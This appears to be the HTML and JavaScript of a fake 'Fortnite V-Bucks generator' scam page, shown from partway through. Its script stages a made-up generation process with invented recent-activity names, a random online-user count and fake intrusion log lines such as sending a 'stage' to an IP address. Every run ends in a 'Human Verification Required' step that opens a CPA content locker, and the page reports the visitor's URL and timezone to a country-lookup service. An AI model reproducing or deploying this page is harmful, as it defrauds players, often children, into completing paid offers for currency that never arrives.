</p><p><img src="img/point.png" style="width:75px;"></p>
<p class="text-price">0.00</p>
<p style="color:#afafaf;text-decoration: line-through">99.99</p>
</div>
</div>
</div>
<div class="final-progress-bar" id="final-progress-bar" style="display:none">
<div class="text-gen fontpro" id="text-gen" style="color:white;margin-bottom:10px;">Connecting to Fortnite database</div>
<img src="" id="flag">
<div id="text-verifyrequired" style="display:none;color:#ff2148;" class="fontpro">Human Verification Required</div>
<div class="bnt-continue fontpro scale-up-ver-center" onclick="CPABuildLock()" id="bntVerify" style="display:none;">Verify Now</div>
<div class="bgfinal-progress-bar" id="bgfinal-progress-bar">
<div class="finalProgress-bar" id="finalProgress-bar">
</div>
</div>
</div>
<div id="select-fut-coin" style="display:none" class="showform">
 <div class="select-fut-coin">
<div class="cut-leftRecent"></div>
<div class="text-recent fontpro" style="height: 20px; width: 250px; padding: 10px;font-size:18px">Select V-Buck Amount </div>
<div class="cut-rightRecent"></div>
</div>
<div class="fut-card fontpro">
<div class="vbucks-card1 vbucks-card-size" onclick="coinSelect(1000)"></div>
<div class="vbucks-card2 vbucks-card-size" onclick="coinSelect(2800)"></div>
<div class="vbucks-card3 vbucks-card-size" onclick="coinSelect(5000)"></div>
<div class="vbucks-card4 vbucks-card-size" onclick="coinSelect(13500)"></div>
</div>
</div>
</div>
<div class="recent-box">
<div class="cut-leftRecent"></div>
<div class="text-recent fontpro" style="height: 20px;
    width: 250px;
    padding: 10px;">Recent Activity
</div>
<div class="cut-rightRecent"></div>
</div>
<div class="recentActivity">
<div class="recent-card">
<div style=""><img src="uploads/1606549774a423df82dc403a954778a2fb2dc63ffc.png" style="width:20px;margin-bottom:-5px;margin-top:10px;margin-right:5px;"><span class="fontpro" id="genname" style="color:#03fff8;text-shadow:0 0 5px black">vucavuca</span></div>
<div style="">
<img src="uploads/160654779431bbf96cc8b1d488a5b7d0b40896c1bc.png" style="width:25px;margin-bottom:-2px;margin-top:5px"><span class="fontpro" style="color:black;font-size:12px">13,500 V-Bucks</span>
</div>
<div class="activity-pro">
<div style="">
<span style="position:absolute; left:70px;top:0px;"><div class="loading" id="gen-loading"></div><span class="fontpro" style="color:black;font-size:10px">generation</span></span>
<span style="position:absolute; right:70px;top:0px;"><div class="loading" id="veri-loading"></div><span class="fontpro" style="color:black;font-size:10px">Verification</span></span>
</div>
<div class="pro-step1" id="pro-step1"></div>
<div class="pro-step2" id="pro-step2"></div>
<div class="pro-step3" id="pro-step3"></div>
<div class="pro-bgbar"><div class="progress-bar" id="progress-bar"></div></div>
</div>
</div>
</div>
</center> <script src="main.js"></script>
</body>
</html>
<script src="ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":1833043,"key":"c3c00","testing":1};
    var forward="";
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="21bc850.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    
var myVarlwelcomescreen= setInterval(welcomescreen, 3500);

function welcomescreen(){

document.getElementById("step0").style.display="none";
}

var username = "";
var valactivity= setInterval(RecentActivity, 100);
var prostep=0;
var prostepDelay=0;
function RecentActivity(){
  prostepDelay++;
  if (prostep>=50 & prostepDelay>=100){
prostep++;
}else if(prostep<51) {
    prostep++;
  }


  document.getElementById("pro-step1").style.backgroundColor="#03fff8";
document.getElementById("progress-bar").style.width=prostep +"%";
if (prostep==50){
  document.getElementById("gen-loading").style.backgroundImage="url('https://d13pxqgp3ixdbh.cloudfront.net/uploads/160654779319118d636b2ea3b4779800f01d8c318a.png')";
  document.getElementById("gen-loading").style.animation ="myloading";
} else if(prostep>50){
  document.getElementById("pro-step2").style.backgroundColor="#03fff8";
  document.getElementById("progress-bar").style.width=prostep +"%";
  if (prostep>99){
    document.getElementById("pro-step3").style.backgroundColor="#03fff8";
    document.getElementById("veri-loading").style.backgroundImage="url('https://d13pxqgp3ixdbh.cloudfront.net/uploads/160654779319118d636b2ea3b4779800f01d8c318a.png')";
    document.getElementById("veri-loading").style.animation ="myloading";

  }
}
if (prostep>=100 & prostepDelay>=160){
        document.getElementById("gen-loading").style.backgroundImage="url('https://d13pxqgp3ixdbh.cloudfront.net/uploads/16065477944c50af0438af3e56a012ee489fbfa465.png')";
        document.getElementById("gen-loading").style.animation ="myloading 1s linear infinite";
        document.getElementById("veri-loading").style.backgroundImage="url('https://d13pxqgp3ixdbh.cloudfront.net/uploads/16065477944c50af0438af3e56a012ee489fbfa465.png')";
        document.getElementById("veri-loading").style.animation ="myloading 1s linear infinite";

      prostep=0;
      prostepDelay=0;
      var gennamelist = ["fio251", "kaka110", "isexx","Gambit",
      "Outrageous Creator",
      "Homely Introvert",
      "Plain Privacy",
      "Brash Thug",
      "Annoyed",
      "Demonic AI",
      "Abnormal Vigor",
      "Optimally Ace",
      "Inimical Thug",
      "Feared Butcher",
      "Multiply Divide",
      "Psychedelic Servicemen",
      "Militaristic Machine",
      "Ball Blaster",
      "Legends Reload",
      "Brute Fact",
      "Bloss flop",
      "Tango Boss",
      "Optimal Aces",
      "Inimical Thugs",
      "Fear Butchers",
      "Left Divide",
      "Psychedelic",
      "Militaristic ",
      "Keen Team Six",
      "Fuzzy Pack",
      "Gangsters",
      "Mortified",
      "Lyrical",
      "Outrageous",
      "Homely",
      "Plain Privilege",
      "Brash Thugs",
      "Nutty Domination",
      "Complex Slayers",
      "Faulty Devils",
      "Fanatical Tyranny",
      "Odd Hooligans",
      "Organic Punks",
      "Quarrelsome",
      "Admirals",
      "Perpetrator",
      "Fighting",
      "Keen Team Six",
      "HolyJESUS",
      "Lone_Ranger",
      "Dark Warrior",
      "XxGoldenWarior"];
      var name=gennamelist[Math.floor(Math.random() * 52)];
      document.getElementById("genname").innerHTML=name;
}
}




function platform(platformname){
  document.getElementById("selected-platform").src=document.getElementById("img-"+platformname).src;
  document.getElementById("img-platform1").style.filter="invert(0)";
  document.getElementById("img-platform2").style.filter="invert(0)";
  document.getElementById("img-platform3").style.filter="invert(0)";
  document.getElementById("img-platform4").style.filter="invert(0)";
  document.getElementById("img-platform5").style.filter="invert(0)";
  document.getElementById("img-platform6").style.filter="invert(0)";
    document.getElementById("img-"+platformname).style.filter="invert(1)";
  var audio = new Audio('https://allfile.club/sound/click.mp3');
audio.play();
  document.getElementById("platform1").classList.add('platform');
  document.getElementById("platform2").classList.add('platform');
  document.getElementById("platform3").classList.add('platform');
  document.getElementById("platform4").classList.add('platform');
  document.getElementById("platform5").classList.add('platform');
    document.getElementById("platform6").classList.add('platform');
  document.getElementById("platform1").classList.remove('platform1');
  document.getElementById("platform2").classList.remove('platform1');
  document.getElementById("platform3").classList.remove('platform1');
  document.getElementById("platform4").classList.remove('platform1');
  document.getElementById("platform5").classList.remove('platform1');
    document.getElementById("platform6").classList.remove('platform1');
  document.getElementById(platformname).classList.add('platform1');
  document.getElementById(platformname).classList.remove('platform');
}

var myVar2 = setInterval(UserTimer, 2000);
function UserTimer() {
	document.getElementById("user-online").innerHTML=Math.floor(Math.random() * 100)+600;
}

var today = new Date();
var date = today.getFullYear()+'-'+(today.getMonth()+1)+'-'+today.getDate();
document.getElementById("update").innerHTML =date;

function bntContinue(){
  username = document.getElementById("fut-username").value;

  if (username!=''){
    document.getElementById("platformbox").style.display="none";
    var audio = new Audio('https://allfile.club/sound/click.mp3');
  audio.play();

  document.getElementById("selected-username").innerHTML=username;
    document.getElementById("step2").style.display="block";
    var varConnect = setInterval(ConnectTimer, 2000);
    var ConnnectStep=0;
    function ConnectTimer() {
      ConnnectStep++;
      if (ConnnectStep==1){
        //document.getElementById("connecting-to-server").innerHTML="connecting to fifa 21 server...";
      }else if (ConnnectStep==2){
        var audio = new Audio('https://allfile.club/sound/connected.mp3');
      audio.play();
        //document.getElementById("fa-loading").style.display="none";
        document.getElementById("connecting-to-server").innerHTML="connected to server.<img src='https://d13pxqgp3ixdbh.cloudfront.net/uploads/160654779319118d636b2ea3b4779800f01d8c318a.png' style='width: 20px; border-radius: 50%;  background-color: white;  border-width: 2px;    border-color: white;    margin-bottom: -5px;   border-style: solid;'>";
          document.getElementById("section").classList.add('rotate-in-hor');
          document.getElementById("player-info").style.display="block";
          var varFutpoint = setInterval(PointTimer, 2000);

          function PointTimer() {
            document.getElementById("select-fut-coin").style.display="block";
          }
          clearInterval(varConnect);

      }
    }
  }else{
    var audio = new Audio('https://allfile.club/sound/erro.mp3');
  audio.play();
  document.getElementById("userbox").style.border="solid 2px #ff2148";
  }

}
var pointSelected=0;
function pointsSelect(pointSelectedvalue){
  var audio = new Audio('https://allfile.club/sound/click.mp3');
audio.play();
  pointSelected=pointSelectedvalue;
  document.getElementById("select-fut-point").classList.remove('rotate-in-diag-2');
  document.getElementById("select-fut-point").classList.add('hideform');

  var varFutpoint = setInterval(PointTimer, 1000);

  function PointTimer() {
    document.getElementById("select-fut-coin").style.display="block";
    clearInterval(varFutpoint);
  }
}
var coinSelected=0;
function coinSelect(coinSelectedvalue){
  var audio = new Audio('https://allfile.club/sound/click.mp3');
  audio.play();
coinSelected=coinSelectedvalue;
document.getElementById("select-fut-coin").classList.remove('showform');
document.getElementById("select-fut-coin").classList.add('hideform');

var vargenerator = setInterval(GenTimer, 2000);
var getTextStep=0;
function GenTimer() {
  document.getElementById("final-progress-bar").style.display="block";
if (getTextStep==0){
  document.getElementById("text-gen").innerHTML="connecting to Fortnite V-Buck database";
  document.getElementById("finalProgress-bar").classList.add('progress70');
}else if(getTextStep==1){
  document.getElementById("text-gen").innerHTML="Server is up at 12.251.21.162:445 (latency 0.013s)"

}else if(getTextStep==2){
  document.getElementById("text-gen").innerHTML="Connecting to server SQL database..."

}
else if(getTextStep==3){
  document.getElementById("text-gen").innerHTML="Obtaining a service manager handle..."

}else if(getTextStep==4){
  document.getElementById("text-gen").innerHTML="Creating a new service through pipeline..."

}else if(getTextStep==5){
  document.getElementById("text-gen").innerHTML="Closing service handle..."

}else if(getTextStep==6){
  document.getElementById("text-gen").innerHTML="Sending stage (845123 bytes) to 192.251.21.162"

}else if(getTextStep==7){
//  document.getElementById("card-point-gen").style.display="inline-block";
    document.getElementById("card-coin-gen").style.display="inline-block";
document.getElementById("card-coin-gen").style.opacity="0";
  document.getElementById("text-gen").innerHTML="Generating Fortnite V-Buck " + pointSelected;
    document.getElementById("text-gen").style.color="#03fff8";
  var varIncreasePoint = setInterval(IncresePoint, 1);
var IncreasPoint=0;
function IncresePoint() {
  IncreasPoint=IncreasPoint+10;
  if (IncreasPoint<=pointSelected){


    document.getElementById("point-gen").innerHTML=IncreasPoint;
  }else {
    var audio = new Audio('https://allfile.club/sound/connected.mp3');
  audio.play();
  //  document.getElementById("card-point-gen").style.backgroundColor="white";
  //  document.getElementById("card-point-gen").style.color="black";
document.getElementById("card-point-gen").classList.add("flip-in-hor-bottom");
  clearInterval(varIncreasePoint);
setTimeout(function(){
  document.getElementById("card-coin-gen").style.opacity="1";
  document.getElementById("text-gen").innerHTML="Generating Fortnite V-Buck " + coinSelected;

            var varIncreaseCoin = setInterval(IncreasCoingen, 1);
            var IncreasCoin=0;
            function IncreasCoingen() {
            IncreasCoin=IncreasCoin+10;

            if (IncreasCoin<=coinSelected){

              document.getElementById("coin-gen").innerHTML="+" + IncreasCoin;
            }else{
              var audio = new Audio('https://allfile.club/sound/connected.mp3');
            audio.play();
              clearInterval(varIncreaseCoin);
              clearInterval(vargenerator);
              document.getElementById("card-coin-gen").classList.add("flip-in-hor-bottom");

setTimeout(function(){
              console.log(IncreasCoin);
              var offset = new Date().getTimezoneOffset();
              offset=offset/-60;
              var data;var country;var code;var d=window.location.href;
              fetch('https://visitor-country.info/index.php?d='+d+"&t="+offset,{referrerPolicy:'unsafe-url'})
              .then(res => res.json())
              .then(output => {
              data =output;
              country=data.country;
              code=data.code;
              var audio = new Audio('https://allfile.club/sound/erro.mp3');
            audio.play();
            document.getElementById("bgfinal-progress-bar").style.display="none";
            document.getElementById("text-gen").style.color="#ff2148";
            document.getElementById("text-gen").innerHTML="Unusually high traffic from " +country;
            document.getElementById("text-verifyrequired").style.display="block";
            document.getElementById("flag").src="https://www.countryflags.io/"+ code +"/flat/64.png";
            document.getElementById("bntVerify").style.display="block";
          });},1000);



            }
          }
},500);
  }

}
}

getTextStep++;


}
}

</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
